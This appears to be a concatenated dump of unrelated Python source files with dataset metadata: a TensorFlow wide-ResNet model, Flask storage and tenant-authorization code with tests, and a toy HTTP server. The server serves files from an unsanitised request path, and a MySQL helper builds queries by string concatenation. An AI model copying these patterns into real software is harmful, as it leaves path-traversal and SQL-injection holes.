num_layers,
filters,
strides=1,
bn_momentum=0.9,
dropout_rate=0,
no_preact=False,
scalar_gate=False,
data_format='channels_last',
training=False,
):
assert num_layers % 2 == 0, "impossible number of layers"
channel_axis = get_channel_axis(data_format)
batch_normalization_bound = functools.partial(
batch_normalization,
axis=channel_axis,
momentum=bn_momentum,
training=training,
)
strided_conv2d = functools.partial(
conv2d,
filters=filters,
strides=strides,
data_format=data_format,
)
bn_relu_conv_bound = functools.partial(
bn_relu_conv,
filters=filters,
kernel_size=3,
bn_momentum=bn_momentum,
data_format=data_format,
training=training,
)
for i in range(num_layers // 2):
use_projection_shortcut = (
i == 0 and (
strides != 1 or
filters != net.get_shape()[channel_axis].value
)
)
if no_preact:
layer = strided_conv2d(net, kernel_size=3)
elif use_projection_shortcut:
net = batch_normalization_bound(net)
net = tf.nn.relu(net)
layer = strided_conv2d(net, kernel_size=3)
else:
layer = bn_relu_conv_bound(net)
layer = bn_relu_conv_bound(layer, dropout_rate=dropout_rate)
if scalar_gate:
layer = scalar_gating(layer)
if use_projection_shortcut:
net = strided_conv2d(net, kernel_size=1)
net += layer
return net
```
#### File: common/train/epochs.py
```python
import logging
import time
import tensorflow as tf
__all__ = ('run_epochs', 'iter_epochs')
# -----------------------------------------------------------------------------
logger = logging.getLogger(__name__)
# -----------------------------------------------------------------------------
class BatchManager(object):
def __init__(self, get_batches):
self._get_batches = get_batches
self._batches = get_batches()
def get_batches(self, done=False):
for batch in self._batches:
yield batch
if not done:
self._batches = self._get_batches()
# -----------------------------------------------------------------------------
def run_epochs(*args, **kwargs):
logger.info("starting session")
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for epoch in iter_epochs(*args, **kwargs):
if isinstance(epoch, tuple):
yield (sess,) + epoch
else:
yield sess, epoch
def iter_epochs(
num_epochs,
valid_interval=None,
get_batches=(),
):
batch_managers = tuple(
BatchManager(get_batches_item)
for get_batches_item in get_batches,
)
logger.info("starting training")
start_time = time.time()
for i in range(num_epochs):
last_epoch = i == num_epochs - 1
extra = []
if valid_interval:
run_valid = i % valid_interval == 0 or last_epoch
extra.append(run_valid)
if batch_managers:
extra.extend(
batch_manager.get_batches(done=last_epoch)
for batch_manager in batch_managers,
)
if extra:
yield (i,) + tuple(extra)
else:
yield i
end_time = time.time()
logger.info("epoch {}: {:.2f}s".format(i, end_time - start_time))
start_time = end_time
```
#### File: dl_papers/common/utils.py
```python
def if_none(value, default):
return value if value is not None else default
```
#### File: dl_papers/wide_resnet/models.py
```python
import functools
import tensorflow as tf
import dl_papers.common.layers as dl_layers
# -----------------------------------------------------------------------------
def wide_resnet_cifar(
inputs,
num_classes,
depth,
width_factor,
dropout_rate=0,
scalar_gate=False,
data_format='channels_last',
training=False,
):
assert (depth - 4) % 3 == 0, "impossible network depth"
conv2d = functools.partial(
dl_layers.resnet.conv2d,
data_format=data_format,
)
residual_group = functools.partial(
dl_layers.resnet.residual_group,
num_layers=(depth - 4) / 3,
dropout_rate=dropout_rate,
scalar_gate=scalar_gate,
data_format=data_format,
training=training,
)
batch_normalization = functools.partial(
dl_layers.batch_normalization,
axis=dl_layers.get_channel_axis(data_format),
training=training,
)
global_avg_pooling2d = functools.partial(
tf.reduce_mean,
axis=dl_layers.get_spatial_axes(data_format),
)
net = inputs
net = conv2d(net, 16, 3, name='pre_conv')
net = residual_group(
net,
filters=16 * width_factor,
strides=1,
name='group_1',
)
net = residual_group(
net,
filters=32 * width_factor,
strides=2,
name='group_2',
)
net = residual_group(
net,
filters=64 * width_factor,
strides=2,
name='group_3',
)
net = batch_normalization(net, name='post_bn')
net = tf.nn.relu(net, name='post_relu')
net = global_avg_pooling2d(net, name='post_pool')
net = tf.layers.dense(net, num_classes, name='output')
return net
# -----------------------------------------------------------------------------
wide_resnet_cifar10 = functools.partial(
wide_resnet_cifar,
num_classes=10,
depth=16,
width_factor=4,
)
wide_gated_resnet_cifar10 = functools.partial(
wide_resnet_cifar10,
scalar_gate=True,
)
``` |
{
"source": "4Catalyzer/flask-annex",
"score": 2
} |
#### File: flask-annex/tests/helpers.py
```python
import json
from io import BytesIO
import flask
import pytest
# -----------------------------------------------------------------------------
def assert_key_value(annex, key, value):
out_file = BytesIO()
annex.get_file(key, out_file)
out_file.seek(0)
assert out_file.read() == value
def get_upload_info(client, key, **kwargs):
response = client.get(f"/upload_info/{key}", **kwargs)
return json.loads(response.get_data(as_text=True))
# -----------------------------------------------------------------------------
class AbstractTestAnnex:
@pytest.fixture
def annex(self, annex_base):
annex_base.save_file("foo/bar.txt", BytesIO(b"1\n"))
annex_base.save_file("foo/baz.json", BytesIO(b"2\n"))
return annex_base
@pytest.fixture(autouse=True)
def routes(self, app, annex):
@app.route("/files/<path:key>", methods=("GET", "PUT"))
def file(key):
if flask.request.method != "GET":
raise NotImplementedError()
return annex.send_file(key)
@app.route("/upload_info/<path:key>")
def upload_info(key):
try:
upload_info = annex.get_upload_info(key)
except NotImplementedError:
upload_info = {
"method": "PUT",
"url": flask.url_for(
"file", key=key, _method="PUT", _external=True,
),
"headers": {
"Authorization": flask.request.headers.get(
"Authorization",
),
},
}
return flask.jsonify(upload_info)
def test_get_file(self, annex):
assert_key_value(annex, "foo/bar.txt", b"1\n")
def test_get_filename(self, tmpdir, annex):
out_filename = tmpdir.join("out").strpath
annex.get_file("foo/bar.txt", out_filename)
assert open(out_filename).read() == "1\n"
def test_list_keys(self, annex):
annex.save_file("foo/qux.txt", BytesIO(b"3\n"))
assert sorted(annex.list_keys("foo/")) == [
"foo/bar.txt",
"foo/baz.json",
"foo/qux.txt",
]
# check that dangling '/' is not relevant
assert sorted(annex.list_keys("foo/")) == sorted(
annex.list_keys("foo")
)
def test_list_keys_nested(self, annex):
assert sorted(annex.list_keys("foo/")) == [
"foo/bar.txt",
"foo/baz.json",
]
def test_save_file(self, annex):
annex.save_file("qux/foo.txt", BytesIO(b"3\n"))
assert_key_value(annex, "qux/foo.txt", b"3\n")
def test_save_filename(self, tmpdir, annex):
in_file = tmpdir.join("in")
in_file.write("4\n")
annex.save_file("qux/bar.txt", in_file.strpath)
assert_key_value(annex, "qux/bar.txt", b"4\n")
def test_replace_file(self, annex):
assert_key_value(annex, "foo/bar.txt", b"1\n")
annex.save_file("foo/bar.txt", BytesIO(b"5\n"))
assert_key_value(annex, "foo/bar.txt", b"5\n")
def test_delete(self, annex):
assert annex.list_keys("foo/bar.txt")
annex.delete("foo/bar.txt")
assert not annex.list_keys("foo/bar.txt")
def test_delete_nonexistent(self, annex):
annex.delete("@@nonexistent")
def test_delete_many(self, annex):
assert annex.list_keys("")
annex.delete_many(("foo/bar.txt", "foo/baz.json", "foo/@@nonexistent"))
assert not annex.list_keys("")
```
#### File: flask-annex/tests/test_s3.py
```python
import base64
import json
from io import BytesIO
from unittest.mock import Mock
import pytest
from flask_annex import Annex
from .helpers import AbstractTestAnnex, assert_key_value, get_upload_info
# -----------------------------------------------------------------------------
try:
import boto3
from moto import mock_s3
import requests
except ImportError:
pytestmark = pytest.mark.skipif(True, reason="S3 support not installed")
# -----------------------------------------------------------------------------
@pytest.yield_fixture
def bucket_name():
with mock_s3():
bucket = boto3.resource("s3").Bucket("flask-annex")
bucket.create()
yield bucket.name
def get_policy(upload_info):
# filter for the "policy" field; there should only be one instance
policy_items = list(
filter(lambda x: x[0] == "policy", upload_info["post_data"]),
)
policy_item = policy_items[0]
return json.loads(
base64.urlsafe_b64decode(policy_item[1].encode()).decode(),
)
def get_condition(conditions, key):
for condition in conditions:
if isinstance(condition, list):
if condition[0] == key:
return condition[1:]
else:
if key in condition:
return condition[key]
raise KeyError()
# -----------------------------------------------------------------------------
class TestS3Annex(AbstractTestAnnex):
@pytest.fixture
def annex_base(self, bucket_name):
return Annex("s3", bucket_name)
def test_save_file_unknown_type(self, annex):
annex.save_file("foo/qux", BytesIO(b"6\n"))
assert_key_value(annex, "foo/qux", b"6\n")
def test_send_file(self, client):
response = client.get("/files/foo/baz.json")
assert response.status_code == 302
s3_url = response.headers["Location"]
# FIXME: Moto doesn't support response-content-disposition, so assert
# on the generated URL rather than Moto's response.
assert "response-content-disposition=attachment" in s3_url
s3_response = requests.get(s3_url)
assert s3_response.status_code == 200
# FIXME: Workaround for spulec/moto#657.
assert "application/json" in s3_response.headers["Content-Type"]
def test_get_upload_info(self, client):
upload_info = get_upload_info(client, "foo/qux.txt")
assert upload_info["method"] == "POST"
assert upload_info["url"] == "https://flask-annex.s3.amazonaws.com/"
assert upload_info["post_data"][0] == ["Content-Type", "text/plain"]
assert upload_info["post_data"][1] == ["key", "foo/qux.txt"]
assert upload_info["post_data"][2] == ["AWSAccessKeyId", "foobar_key"]
assert upload_info["post_data"][3][0] == "policy"
assert upload_info["post_data"][4][0] == "signature"
conditions = get_policy(upload_info)["conditions"]
assert get_condition(conditions, "bucket") == "flask-annex"
assert get_condition(conditions, "key") == "foo/qux.txt"
assert get_condition(conditions, "Content-Type") == "text/plain"
self.assert_default_content_length_range(conditions)
def assert_default_content_length_range(self, conditions):
with pytest.raises(KeyError):
get_condition(conditions, "content-length-range")
def test_get_upload_info_max_content_length(self, app, client):
app.config["MAX_CONTENT_LENGTH"] = 100
upload_info = get_upload_info(client, "foo/qux.txt")
conditions = get_policy(upload_info)["conditions"]
self.assert_app_config_content_length_range(conditions)
def assert_app_config_content_length_range(self, conditions):
assert get_condition(conditions, "content-length-range") == [0, 100]
def test_get_upload_info_unknown_content_type(self, client):
upload_info = get_upload_info(client, "foo/qux.@@nonexistent")
assert upload_info["method"] == "POST"
assert upload_info["url"] == "https://flask-annex.s3.amazonaws.com/"
# filter for the "key" field; there should be only one instance
key_items = list(
filter(lambda x: x[0] == "key", upload_info["post_data"]),
)
key_item = key_items[0]
assert key_item[1] == "foo/qux.@@nonexistent"
# should not have 'Content-Type' in the post data
assert all(
post_data_pair[0] != "Content-Type"
for post_data_pair in upload_info["post_data"]
)
def test_delete_many_empty_list(self, annex, monkeypatch):
mock = Mock()
monkeypatch.setattr(annex._client, "delete_objects", mock)
annex.delete_many(tuple())
mock.assert_not_called()
class TestS3AnnexFromEnv(TestS3Annex):
@pytest.fixture
def annex_base(self, monkeypatch, bucket_name):
monkeypatch.setenv("FLASK_ANNEX_STORAGE", "s3")
monkeypatch.setenv("FLASK_ANNEX_S3_BUCKET_NAME", bucket_name)
monkeypatch.setenv("FLASK_ANNEX_S3_REGION", "us-east-1")
return Annex.from_env("FLASK_ANNEX")
class TestS3AnnexMaxContentLength(TestS3Annex):
@pytest.fixture
def annex_base(self, bucket_name):
return Annex("s3", bucket_name, max_content_length=1000)
def assert_default_content_length_range(self, conditions):
assert get_condition(conditions, "content-length-range") == [0, 1000]
def assert_app_config_content_length_range(self, conditions):
assert get_condition(conditions, "content-length-range") == [0, 1000]
``` |
{
"source": "4Catalyzer/flask-resty-tenants",
"score": 2
} |
#### File: flask-resty-tenants/flask_resty_tenants/authorization.py
```python
from uuid import UUID
import flask
from flask_resty import (
ApiError,
AuthorizeModifyMixin,
HasCredentialsAuthorizationBase,
)
from flask_resty.utils import settable_property
# -----------------------------------------------------------------------------
PUBLIC = float("-inf")
READ_ONLY = 0
MEMBER = 1
ADMIN = 2
NOT_ALLOWED = float("inf")
# -----------------------------------------------------------------------------
class TenantAuthorization(
AuthorizeModifyMixin, HasCredentialsAuthorizationBase,
):
read_role = READ_ONLY
modify_role = MEMBER
role_field = "app_metadata"
global_tenant = "*"
tenant_id_type = UUID
tenant_id_field = "tenant_id"
@settable_property
def save_role(self):
return self.modify_role
@settable_property
def create_role(self):
return self.modify_role
@settable_property
def update_role(self):
return self.modify_role
@settable_property
def delete_role(self):
return self.modify_role
def get_request_tenant_id(self):
return flask.request.view_args[self.tenant_id_field]
def get_model_tenant_id(self, model):
return self.get_tenant_id(model)
def get_item_tenant_id(self, item):
return self.get_tenant_id(item)
def get_tenant_id(self, model_or_item):
return getattr(model_or_item, self.tenant_id_field)
def get_data_tenant_id(self, data):
return data[self.tenant_id_field]
def get_role_data(self):
return self.get_credentials_dict_value(self.role_field)
def get_credentials_dict_value(self, key):
try:
value = self.get_request_credentials()[key]
except (TypeError, KeyError):
value = {}
return value if isinstance(value, dict) else {}
def ensure_role(self, role):
return role if isinstance(role, int) else PUBLIC
def get_global_role(self):
role = self.get_role_data().get(self.global_tenant, PUBLIC)
return self.ensure_role(role)
def get_tenant_role(self, tenant_id):
global_role = self.get_global_role()
try:
role = self.ensure_role(self.get_role_data()[str(tenant_id)])
except KeyError:
return global_role
return max(role, global_role)
def get_authorized_tenant_ids(self, required_role):
tenant_ids = []
for tenant_id, tenant_role in self.get_role_data().items():
try:
tenant_id = self.tenant_id_type(tenant_id)
except (TypeError, AttributeError, ValueError):
continue
if not isinstance(tenant_role, int):
continue
if tenant_role < required_role:
continue
tenant_ids.append(tenant_id)
return frozenset(tenant_ids)
def is_authorized(self, tenant_id, required_role):
return self.get_tenant_role(tenant_id) >= required_role
def authorize_request(self):
super().authorize_request()
self.check_request_tenant_id()
def check_request_tenant_id(self):
try:
tenant_id = self.get_request_tenant_id()
except KeyError:
return
if self.get_tenant_role(tenant_id) < self.read_role:
flask.abort(404)
def filter_query(self, query, view):
if self.get_global_role() >= self.read_role:
return query
return query.filter(self.get_filter(view))
def get_filter(self, view):
return self.get_model_tenant_id(view.model).in_(
self.get_authorized_tenant_ids(self.read_role),
)
def authorize_update_item(self, item, data):
self.authorize_update_item_tenant_id(item, data)
super().authorize_update_item(item, data)
def authorize_update_item_tenant_id(self, item, data):
try:
data_tenant_id = self.get_data_tenant_id(data)
except KeyError:
pass
else:
if data_tenant_id != self.get_item_tenant_id(item):
raise ApiError(403, {"code": "invalid_data.tenant"})
def authorize_modify_item(self, item, action):
required_role = self.get_required_role(action)
self.authorize_item_tenant_role(item, required_role)
def get_required_role(self, action):
return getattr(self, f"{action}_role")
def authorize_item_tenant_role(self, item, required_role):
tenant_id = self.get_item_tenant_id(item)
if not self.is_authorized(tenant_id, required_role):
raise ApiError(403, {"code": "invalid_tenant.role"})
```
#### File: flask-resty-tenants/tests/test_e2e.py
```python
import json
import flask
import pytest
from flask_resty import Api, AuthenticationBase, GenericModelView
from flask_resty.testing import assert_response
from marshmallow import Schema, fields
from sqlalchemy import Column, Integer, String
from flask_resty_tenants import ADMIN, TenantAuthorization
# -----------------------------------------------------------------------------
TENANT_ID_1 = "tenant_1"
TENANT_ID_2 = "tenant_2"
TENANT_ID_3 = "tenant_3"
USER_CREDENTIALS = {TENANT_ID_1: 0, TENANT_ID_2: 1}
USER_READ_CREDENTIALS = {TENANT_ID_1: 0, TENANT_ID_2: 0}
USER_ADMIN_CREDENTIALS = {TENANT_ID_1: 0, TENANT_ID_2: 2}
DEFAULT_WRITE_CREDENTIALS = {"*": 1}
DEFAULT_READ_CREDENTIALS = {"*": 0}
DEFAULT_ADMIN_CREDENTIALS = {"*": 2}
# -----------------------------------------------------------------------------
@pytest.yield_fixture
def models(db):
class Widget(db.Model):
__tablename__ = "widgets"
id = Column(Integer, primary_key=True)
tenant_id = Column(String)
name = Column(String)
db.create_all()
yield {
"widget": Widget,
}
db.drop_all()
@pytest.fixture
def schemas():
class WidgetSchema(Schema):
id = fields.Integer(as_string=True)
owner_id = fields.String()
name = fields.String()
tenant_id = fields.String()
return {
"widget": WidgetSchema(),
}
@pytest.fixture
def auth():
# dummy authentication based on query params
class Authentication(AuthenticationBase):
def get_request_credentials(self):
return {
"app_metadata": {
k: int(v) for k, v in flask.request.args.items()
}
}
class Authorization(TenantAuthorization):
tenant_id_type = str
class AdminAuthorization(TenantAuthorization):
read_role = ADMIN
modify_role = ADMIN
tenant_id_type = str
return {
"authentication": Authentication(),
"authorization": Authorization(),
"admin_authorization": AdminAuthorization(),
}
@pytest.fixture(autouse=True)
def routes(app, models, schemas, auth):
class WidgetViewBase(GenericModelView):
model = models["widget"]
schema = schemas["widget"]
authentication = auth["authentication"]
authorization = auth["authorization"]
class WidgetListView(WidgetViewBase):
def get(self):
return self.list()
def post(self):
return self.create()
class TenantWidgetListView(WidgetViewBase):
def get(self, tenant_id):
return self.list()
class WidgetView(WidgetViewBase):
def get(self, id):
return self.retrieve(id)
def patch(self, id):
return self.update(id, partial=True)
def delete(self, id):
return self.destroy(id)
class AdminWidgetView(WidgetViewBase):
authorization = auth["admin_authorization"]
def get(self, id):
return self.retrieve(id)
def patch(self, id):
return self.update(id, partial=True)
def delete(self, id):
return self.destroy(id)
api = Api(app)
api.add_resource(
"/widgets", WidgetListView, WidgetView, id_rule="<int:id>"
)
api.add_resource(
"/tenants/<tenant_id>/widgets", TenantWidgetListView,
)
api.add_resource(
"/admin_widgets/<int:id>", AdminWidgetView,
)
@pytest.fixture(autouse=True)
def data(db, models):
db.session.add_all(
(
models["widget"](tenant_id=TENANT_ID_1, name="Foo"),
models["widget"](tenant_id=TENANT_ID_2, name="Bar"),
models["widget"](tenant_id=TENANT_ID_3, name="Baz"),
)
)
db.session.commit()
# -----------------------------------------------------------------------------
def request(client, method, path, data, **kwargs):
return client.open(
path,
method=method,
content_type="application/json",
data=json.dumps({"data": data}),
**kwargs,
)
# -----------------------------------------------------------------------------
def test_list(client):
response = client.get("/widgets", query_string=USER_CREDENTIALS)
assert_response(response, 200, [{"name": "Foo"}, {"name": "Bar"},])
@pytest.mark.parametrize(
"tenant_id, result",
((TENANT_ID_1, 200), (TENANT_ID_2, 200), (TENANT_ID_3, 404),),
)
def test_tenant_list(client, tenant_id, result):
response = client.get(
f"/tenants/{tenant_id}/widgets", query_string=USER_CREDENTIALS,
)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 200),
(USER_CREDENTIALS, 200),
(DEFAULT_READ_CREDENTIALS, 200),
(DEFAULT_WRITE_CREDENTIALS, 200),
(None, 404),
),
)
def test_retrieve(client, credentials, result):
response = client.get("/widgets/1", query_string=credentials)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 404),
(USER_CREDENTIALS, 404),
(DEFAULT_READ_CREDENTIALS, 404),
(DEFAULT_WRITE_CREDENTIALS, 404),
(None, 404),
(USER_ADMIN_CREDENTIALS, 200),
(DEFAULT_ADMIN_CREDENTIALS, 200),
),
)
def test_admin_retrieve(client, credentials, result):
response = client.get("/admin_widgets/2", query_string=credentials)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 403),
(USER_CREDENTIALS, 201),
(DEFAULT_READ_CREDENTIALS, 403),
(DEFAULT_WRITE_CREDENTIALS, 201),
(None, 403),
),
)
def test_create(client, credentials, result):
response = request(
client,
"POST",
"/widgets",
{"name": "Created", "tenant_id": TENANT_ID_2,},
query_string=credentials,
)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 403),
(USER_CREDENTIALS, 200),
(DEFAULT_READ_CREDENTIALS, 403),
(DEFAULT_WRITE_CREDENTIALS, 200),
(None, 404),
),
)
def test_update(client, credentials, result):
response = request(
client,
"PATCH",
"/widgets/2",
{"id": "2", "name": "Updated",},
query_string=credentials,
)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 404),
(USER_CREDENTIALS, 404),
(DEFAULT_READ_CREDENTIALS, 404),
(DEFAULT_WRITE_CREDENTIALS, 404),
(None, 404),
(USER_ADMIN_CREDENTIALS, 200),
(DEFAULT_ADMIN_CREDENTIALS, 200),
),
)
def test_admin_update(client, credentials, result):
response = request(
client,
"PATCH",
"/admin_widgets/2",
{"id": "2", "name": "Updated",},
query_string=credentials,
)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 403),
(USER_CREDENTIALS, 403),
(DEFAULT_READ_CREDENTIALS, 403),
(DEFAULT_WRITE_CREDENTIALS, 403),
(None, 404),
),
)
def test_update_tenant_id(client, credentials, result):
response = request(
client,
"PATCH",
"/widgets/2",
{"id": "2", "tenant_id": TENANT_ID_1,},
query_string=credentials,
)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 403),
(USER_CREDENTIALS, 204),
(DEFAULT_READ_CREDENTIALS, 403),
(DEFAULT_WRITE_CREDENTIALS, 204),
(None, 404),
),
)
def test_delete(client, credentials, result):
response = client.delete("/widgets/2", query_string=credentials)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 404),
(USER_CREDENTIALS, 404),
(DEFAULT_READ_CREDENTIALS, 404),
(DEFAULT_WRITE_CREDENTIALS, 404),
(None, 404),
(USER_ADMIN_CREDENTIALS, 204),
(DEFAULT_ADMIN_CREDENTIALS, 204),
),
)
def test_admin_delete(client, credentials, result):
response = client.delete("/admin_widgets/2", query_string=credentials)
assert_response(response, result)
``` |
{
"source": "4Catalyzer/fourmat",
"score": 2
} |
#### File: fourmat/test/test_project.py
```python
import os
from pathlib import Path
import pytest
from fourmat.lint import Project, PathContext
TEST_DIR = Path(__file__).parent.resolve()
REPO_ROOT = TEST_DIR.parent.resolve()
@pytest.fixture
def reset():
Project._PROJECT_ROOT = None
os.chdir(REPO_ROOT)
def test_project(reset):
with PathContext(TEST_DIR):
assert str(Project.get_root()) == str(REPO_ROOT)
def test_with_pyproject(reset):
test_project_path = (TEST_DIR / "fixture" / "test_project").resolve()
with PathContext(test_project_path):
assert str(Project.get_root()) == str(test_project_path)
def test_with_fourmat_file(reset):
test_project_path = (
TEST_DIR / "fixture" / "test_project_fourmat"
).resolve()
with PathContext(test_project_path):
assert str(Project.get_root()) == str(test_project_path)
def test_fixture_dir(reset):
fixture = (TEST_DIR / "fixture").resolve()
with PathContext(fixture):
assert str(Project.get_root()) == str(REPO_ROOT)
def test_system_pwd_fallback(reset):
with PathContext("/tmp"):
assert str(Project.get_root()) == str(Path("/tmp").resolve())
``` |
{
"source": "4Catalyzer/tqp",
"score": 2
} |
#### File: tqp/tests/test_topic_queue_poller.py
```python
import json
import time
from threading import Thread
from unittest.mock import Mock
import boto3
from moto import mock_s3, mock_sns, mock_sqs
from moto.server import backends
from tqp.topic_queue_poller import TopicQueuePoller, create_queue
# -----------------------------------------------------------------------------
sqs_backends = backends.get_backend("sqs")
@mock_sqs
def test_create_queue():
create_queue("foo", tags={"my": "tag"})
queue = sqs_backends["us-east-1"].queues["foo"]
dlq = sqs_backends["us-east-1"].queues["foo-dead-letter"]
assert queue.tags == {"tqp": "true", "dlq": "false", "my": "tag"}
assert dlq.tags == {"tqp": "true", "dlq": "true", "my": "tag"}
assert queue.redrive_policy == {
"maxReceiveCount": 5,
"deadLetterTargetArn": "arn:aws:sqs:us-east-1:123456789012:foo-dead-letter",
}
@mock_sqs
@mock_sns
def test_tqp():
poller = TopicQueuePoller("foo", prefix="test")
handled_item = None
@poller.handler("my_event")
def handle_my_event(item):
nonlocal handled_item
handled_item = item
t = Thread(target=poller.start, daemon=True)
t.start()
# making sure poller is polling
time.sleep(0.1)
boto3.client("sns").publish(
TopicArn="arn:aws:sns:us-east-1:123456789012:test--my_event",
Message='{"bar": "baz"}',
)
# making sure message is processed
time.sleep(0.05)
assert handled_item == {"bar": "baz"}
@mock_sqs
@mock_s3
def test_s3():
s3 = boto3.client("s3")
s3.create_bucket(Bucket="bucket_foo")
poller = TopicQueuePoller("foo", prefix="test")
handled_item = None
@poller.s3_handler("bucket_foo")
def handle_my_event(item):
nonlocal handled_item
handled_item = item
t = Thread(target=poller.start, daemon=True)
t.start()
# making sure poller is polling
time.sleep(0.5)
poller._handle_message(
Mock(
body=json.dumps(
{
"Records": [
{
"eventSource": "aws:s3",
"eventName": "ObjectCreated:Put",
"s3": {
"bucket": {"name": "bucket_foo"},
"object": {"the": "object"},
},
}
]
}
)
)
)
assert handled_item == {
"bucket_name": "bucket_foo",
"event_name": "ObjectCreated:Put",
"object": {"the": "object"},
}
assert s3.get_bucket_notification_configuration(Bucket="bucket_foo")[
"QueueConfigurations"
] == [
{
"Events": ["s3:ObjectCreated:*"],
"Id": "tqp-subscription",
"QueueArn": "arn:aws:sqs:us-east-1:123456789012:test--foo",
}
]
``` |
{
"source": "4cc3ssflick/4Setter",
"score": 3
} |
#### File: 4cc3ssflick/4Setter/4setter.py
```python
import socket, sys, os, re, time
class asetter(object):
response_status = 200
response_status_set = "OK"
response_header = ""
response_mime = "text/html"
response_client = "GET / HTTP/1.1" if False else ""
response_data = ""
lhost = "0.0.0.0"
lport = 40
response_file = ""
doc_path = '/var/www' # os.getcwd()+'/'
def header(self):
mime_ext = {
"pdf" : "application/pdf",
"txt" : "text/plain",
"htm" : "text/html",
"exe" : "application/octet-stream",
"zip" : "application/zip",
"doc" : "application/msword",
"xls" : "application/vnd.ms-excel",
"ppt" : "application/vnd.ms-powerpoint",
"gif" : "image/gif",
'php': 'text/plain',
'py': 'text/plain',
'html': 'text/html',
'js': 'application/javascript',
'css': 'text/css',
'jpeg': 'image/jpeg',
'jpg': 'image/jpeg',
'png': 'image/png',
'mp4': 'video/mp4',
'mp3': 'audio/mpeg'
}
index_file = ['index.html', 'index.htm', 'index.php']
for mime in mime_ext:
try:
self.response_mime = mime_ext[self.response_file.split('.')[-1]]
except KeyError:
self.response_mime = "text/html"
try:
if self.response_file != '/':
try:
if self.doc_path[-1] == '/':
f = open(self.doc_path[:-1] + self.response_file, "rb")
else:
f = open(self.doc_path + self.response_file, "rb")
self.response_status = 200
self.response_status_set = "OK"
self.response_data = f.read()
except IsADirectoryError:
self.response_status = 403
self.response_status_set = "Forbidden"
self.response_data = b"""<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>403 Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
</body>
</html>"""
else:
for index in index_file:
try:
if self.doc_path[-1] == '/':
f = open(self.doc_path+index, 'rb')
else:
f = open(self.doc_path+'/'+index, 'rb')
self.response_status = 200
self.response_status_set = "OK"
self.response_data = f.read()
break
except FileNotFoundError:
pass
except FileNotFoundError:
self.response_status = 404
self.response_status_set = "Not Found"
self.response_data = b"""<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body>
</html>
"""
self.response_header = "HTTP/1.1 %d %s\n" % (self.response_status, self.response_status_set)
self.response_header += "Date: %s\n" % time.strftime("%a, %d %b %Y %H:%M:%S GMT")
self.response_header += "Server: 4Setter Server\n"
self.response_header += "Content-Length: %d\n" % int(len(self.response_data))
self.response_header += "Vary: Accept-Encoding\n"
self.response_header += "Connection: Close\n"
self.response_header += "Content-Type: %s\n\n" % self.response_mime
def server(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
s.bind((self.lhost, self.lport))
s.listen(5)
print(f"[{b}*{n}] Server binding started at {g}{self.lhost}{n}:{g}{self.lport}{n}")
while True:
try:
conn, addr = s.accept()
except KeyboardInterrupt:
print(f"[{r}!{n}] Shutting down the server... ", end='')
s.close()
print(f"{g}OK{n}")
sys.exit(0)
self.response_client = conn.recv(1024).decode()
self.response_file = re.split(' ', self.response_client.splitlines()[0])[1].replace("%20", " ")
self.header()
print(f'{g}%s{n} - - [{b}%s{n}] \"%s\" %d -' % (addr[0], time.strftime("%d/%m/%Y %H:%M:%S"), self.response_client.splitlines()[0], self.response_status))
conn.sendall(self.response_header.encode() + self.response_data)
if __name__ == '__main__':
r = '\033[031m'
g = '\033[032m'
b = '\033[036m'
k = '\033[030m'
n = '\033[00m'
banner = """
{r}____ {g}____ __ {b}__{n}
{r}/ / /{g}/ __/__ / /_{b}/ /____ ____{n}
{r}/_ _/{g}\ \/ -_) __/{b} __/ -_) __/{n}
{r}/_/{g}/___/\__/\__/{b}\__/\__/_/{n}
{r}MSF{n}{b}: http://www.{n}mmsecurity.n{g}et/forum/member.php?action=register&referrer=9450{n}
{r}v1.0{n}
""".format(r=r, g=g, b=b, n=n)
print(banner)
asetter().server()
``` |
{
"source": "4cd87a/attestation-deplacement-derogatoire-telegram-bot",
"score": 3
} |
#### File: 4cd87a/attestation-deplacement-derogatoire-telegram-bot/sql.py
```python
import os.path, random, time
from datetime import datetime
import mysql.connector
import config
class SQLighter:
def __init__(self, telid=None, idd=None, logger=None):
self.logger = logger
self.connection = mysql.connector.connect(
host=config.mysql_host,
port=config.mysql_port,
user=config.mysql_user,
passwd=config.mysql_passwd,
database=config.mysql_database
)
self.cursor = self.connection.cursor()
self.idd = None
self.user = self.user_get(telid=telid,idd=idd)
self.idd = None if self.user is None else self.user['id']
def _print(self, txt, type="INFO"):
if self.logger == None:
#return
print("[{}] : {}".format(type, txt))
else:
type = type.lower()
if type == "info" or type == 'i':
self.logger.info(txt)
if type == "warning" or type == 'w':
self.logger.warning(txt)
if type == "error" or type == 'e':
self.logger.error(txt)
def close(self):
self.cursor.close()
self.connection.close()
def getFromTable(self, table, field, like=""):
field_text = ""
for f in field:
field_text += "`" + str(f) + "`,"
field_text = field_text[0:-1]
table = '`' + str(table) + '`'
# with self.connection:
self._print("SELECT " + field_text + " FROM " + str(table) + " " + like, 'i')
self.cursor.execute("SELECT " + field_text + " FROM " + str(table) + " " + like)
res = self.cursor.fetchall()
self.connection.commit()
if len(res):
ret = []
for j in range(len(res)):
dic = {}
for i, f in enumerate(field):
dic.update({f: res[j][i]})
ret.append(dic)
return ret
else:
return []
def addToTable(self, table, field, whattoad):
if len(field) != len(whattoad): raise ValueError("field and whattoad aren't the same leng in addToTable")
field_text = "("
add_text = "("
